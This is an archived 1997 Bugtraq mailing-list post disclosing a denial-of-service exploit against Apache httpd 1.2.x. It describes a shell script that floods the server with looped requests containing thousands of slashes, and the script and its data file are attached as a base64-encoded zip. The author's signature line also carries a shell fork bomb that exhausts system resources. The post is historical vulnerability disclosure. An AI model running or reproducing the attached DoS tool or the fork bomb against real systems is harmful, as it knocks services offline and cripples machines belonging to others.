 | ||||||
| << Previous | INDEX | Search | src | Set bookmark | Go to bookmark | Next >> |
| ||||||
| |||||||||||||||||||||
X-RDate: Wed, 31 Dec 1997 09:57:30 +0500 (ESK)
Date: Tue, 30 Dec 1997 11:07:04 +0100
From: =?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski <lcamtuf@POLBOX.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Apache DoS attack?
This is a multi-part message in MIME format.
------=_NextPart_000_0041_01BD1513.0F761240
Content-Type: text/plain;
charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable
[execuse me if it has been discovered before]
Here's a simple exploit for Apache httpd version 1.2.x (tested on =
1.2.4).
When launched, causes incerases of victim's load average and extreme
slowdowns of disk operations. On my i586 Linux annoying slowdown has =
been
experienced immediately (after maybe 5 seconds). After about 4 minutes
work has been turned into real hell (286?).
Attached program ('beck') is a shell script. It works by sending
excessive http requests with thousands of '/'s inside (parsed from file
'beck.dat'). Single request causes just a little longer thinking of
Apache. But when requests are sent from a loop - huh, victim
system becomes slower and slower... At least on my machine, maybe when
Apache is running on a lightspeed workstation this script makes no
difference.
PS. Fast connection should help... All depends on victim's system
performance.
_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
=3D--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] =
---------=3D
------=_NextPart_000_0041_01BD1513.0F761240
Content-Type: application/x-zip-compressed;
name="beck.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="beck.zip"
UEsDBBQAAgAIAGCmnSMQwy97+QEAAKADAAAEABAAYmVja1VYDADzFKg0I/+nNAAAAACFUl1P2zAU
fc+vOHgVbJqStvAydYDGumpCDJAKe1mFwHFuawvXrmynQdN+/JyPfrBNmh8iJTnn3HPO9ZuDfq5M
P+deJgkJaZsH2OfJ+AppiosVF5IwzI6zF3who7iGneOO1kqQBw+Bi2fWkS7KIK0b4VoJGXE/uKbK
PyucasGXoZx/yq33mQ/c/1Qiq3iVrfR5S04SNccMrDdkODsDY3j4iCDJJEAr/v3u4utkhN4AcXRQ
y0dpfcBMSKUL/8A63BaOVzCk4EXhyPvaffsHrjRGmUWXke1RW1G0J4WxWU3zalnqwA2RLT2ENYai
jjUes5PBKwcvKmCQzFWSjG9vbh6/XV5f3p+dDLYhjxkO/gi5B+wdN9QGe4B0jpzEc1bw8Fcnk+n0
djrCXGnC0QZ1hGUZI+eEleaCCigDUTpHJqBQLvu30W6DzT7rUnpDvF0rjt7O2H7kd/XlGAen348R
LHhuXcg29+BeknLQlhfga3J8QfDWGlRKawitljmkWkhyiMCFDD4yk0rWKWZ13rjjmLSoHQbShkLt
5sMAp9siDs/7Ba37poyChxHW9brzypBGNfa08r8WjlZIRSf1tF9612NqwMZ764wOYy+O6mtRxP1X
XIXYSZZlYA1r4/U/E9nWPWvHNpHq4zVFyLB5K6yhnRd2e1XPiCtpvv8GUEsDBBQAAgAIAHmdnSPu
voPlIgAAAPYfAAAIABAAYmVjay5kYXRVWAwAZwSoNGbvpzQAAAAA7cFBEQAABACwvxQaSOEU0D+L
HO62TW8WAAAAAAAAAPBPHFBLAQIVAxQAAgAIAGCmnSMQwy97+QEAAKADAAAEAAwAAAAAAAEAAED/
gQAAAABiZWNrVVgIAPMUqDQj/6c0UEsBAhUDFAACAAgAeZ2dI+6+g+UiAAAA9h8AAAgADAAAAAAA
AQAAQLaBKwIAAGJlY2suZGF0VVgIAGcEqDRm76c0UEsFBgAAAAACAAIAgAAAAIMCAAAAAA==
------=_NextPart_000_0041_01BD1513.0F761240--
| |||||||||||||||||||||